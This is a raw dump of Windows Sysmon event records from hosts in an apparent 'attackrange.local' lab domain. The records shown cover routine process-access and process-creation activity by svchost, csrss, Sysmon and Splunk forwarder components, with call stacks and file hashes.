09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-89CE-6151-A579-00000000FD01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.592{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89CE-6151-A579-00000000FD01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.578{69CF5F33-89CE-6151-A579-00000000FD01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000977894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:26.124{69CF5F33-89CD-6151-A479-00000000FD01}36281108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:27.332{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8947C9C33E0D1F55DBF2E5DE494FB980,SHA256=6833486C69EB13E2E18EE86B3AE470C57FC24EBA77B9FC73AE3B2CF5D738A616,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89CF-6151-A779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-89CF-6151-A779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977936Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977935Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977934Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977933Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977932Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977931Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977930Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977929Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977928Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977927Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.983{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89CF-6151-A779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977926Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.953{69CF5F33-89CF-6151-A779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program 